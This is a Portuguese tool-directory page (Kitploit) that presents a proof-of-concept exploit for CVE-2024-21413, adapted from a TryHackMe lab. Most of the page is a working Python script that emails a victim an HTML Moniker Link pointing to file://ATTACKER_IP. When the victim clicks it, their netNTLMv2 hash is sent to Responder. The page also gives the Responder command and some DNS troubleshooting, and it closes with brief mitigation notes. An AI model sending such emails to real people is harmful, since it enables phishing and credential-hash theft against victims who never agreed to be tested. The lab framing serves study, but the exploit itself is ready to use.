Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Email-exploit-Moniker-Link-CVE-2024-21413- — Exploit de prova de conceito para CVE-2024-21413 usando Moniker Link em e-mail HTML para acionar conexão SMB e capturar hashes netNTLMv2 via Responder. Demonstra habilidades em testes de penetração, script Python e análise de protocolos de rede. | Kitploit
Ferramentas/GitHubGitHub/yass2400012/email-exploit-moniker-link-cve-2024-21413-
Quebra de SenhasExploraçãoPhishingSegurança de RedeTestes de PenetraçãoAprendizado e EducaçãoRed TeamingSegurança de EmailLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubyass2400012/email-exploit-moniker-link-cve-2024-21413-

Email-exploit-Moniker-Link-CVE-2024-21413-

Exploit de prova de conceito para CVE-2024-21413 usando Moniker Link em e-mail HTML para acionar conexão SMB e capturar hashes netNTLMv2 via Responder. Demonstra habilidades em testes de penetração, script Python e análise de protocolos de rede.

Ver Repositório
7há 11 mesesAinda não revisado

Email exploit Moniker Link-CVE-2024-21413-Module — Documentação

Visão geral: Um PoC prático que demonstra o uso de um Moniker Link em um e-mail HTML para acionar uma conexão SMB a partir do Outlook, permitindo a captura do hash netNTLMv2 da vítima via Responder. Isso demonstra habilidades práticas em teste de penetração, desenvolvimento de scripts e análise de protocolos de rede.


Habilidades-chave Demonstradas

  • Criação de scripts em Python para envio automatizado de e-mails
  • Compreensão dos protocolos SMB, NTLMv2, LLMNR, NBT-NS e MDNS
  • Configuração e monitoramento do Responder para captura de hash
  • Diagnóstico de problemas de configuração de rede/DNS no Linux
  • Elaboração de um cenário controlado de segurança ofensiva em ambiente de laboratório

Fluxo de Trabalho do PoC

  1. Configurar o listener SMB: Inicie o Responder na máquina do atacante para monitorar as tentativas de autenticação SMB.
  2. Enviar e-mail elaborado: Use um script Python para entregar um e-mail HTML com um Moniker Link (file://) apontando para o compartilhamento SMB do atacante.
  3. Captura do hash: Quando a vítima clica no link, o Outlook tenta buscar o arquivo via SMB, e o Responder captura o hash netNTLMv2.

Script de Exploit Mínimo

root@kitploit:~
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')

Dica: Substitua ATTACKER_IP e mailserver antes de executar. No laboratório do TryHackMe, a senha é attacker.


Executando o Responder

root@kitploit:~
responder -I ens5

Substitua ens5 pelo nome da sua interface de rede.


Solucionando Problemas do /etc/resolv.conf

Às vezes o Responder falha devido a links simbólicos quebrados em /etc/resolv.conf. Corrija com:

root@kitploit:~
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf

Habilidades em destaque: Solução de problemas no Linux, configuração de DNS e adaptação de ferramentas para ambientes em nuvem/VM.


Capturas de Tela do Progresso

  1. Erro / Problema com o resolv.conf:` Error Resolv.conf

  2. Correção de DNS Aplicada: DNS Setup Fix

  3. Script de E-mail em Python: Python Email Script

  4. Entrega do Exploit: Exploit Delivery

  5. Caixa de Entrada da Vítima: Victim Email

  6. Hash da Vítima Capturado: Captured Victim Hash


Ferramentas e Comandos Utilizados

  • Responder: listener SMB/LLMNR/NBT-NS/MDNS
  • Python3: execução do script de e-mail do PoC
  • smtplib / email.mime: bibliotecas Python para criar e enviar e-mails
  • Comandos de shell Linux para solução de problemas de DNS

Habilidades Adquiridas / Destaque do Portfólio

  • Simulação de ataques de rede e fluxo de trabalho de exploração
  • Automação de vetor de engenharia social (e-mail com Moniker Link)
  • Captura e análise de hashes netNTLMv2
  • Solução de problemas interdisciplinar: Python, redes e interação entre Windows e Linux
  • Documentação e apresentação do fluxo de trabalho para revisores técnicos

Mitigação e Notas Defensivas

  • Desative o conteúdo externo automático no Outlook
  • Bloqueie SMB de saída para redes não confiáveis
  • Imponha assinatura SMB e políticas de autenticação modernas em clientes Windows

Atribuição

Adaptado do laboratório MonikerLink do TryHackMe e do PoC original de CMNatic (GitHub)

Baixar ferramenta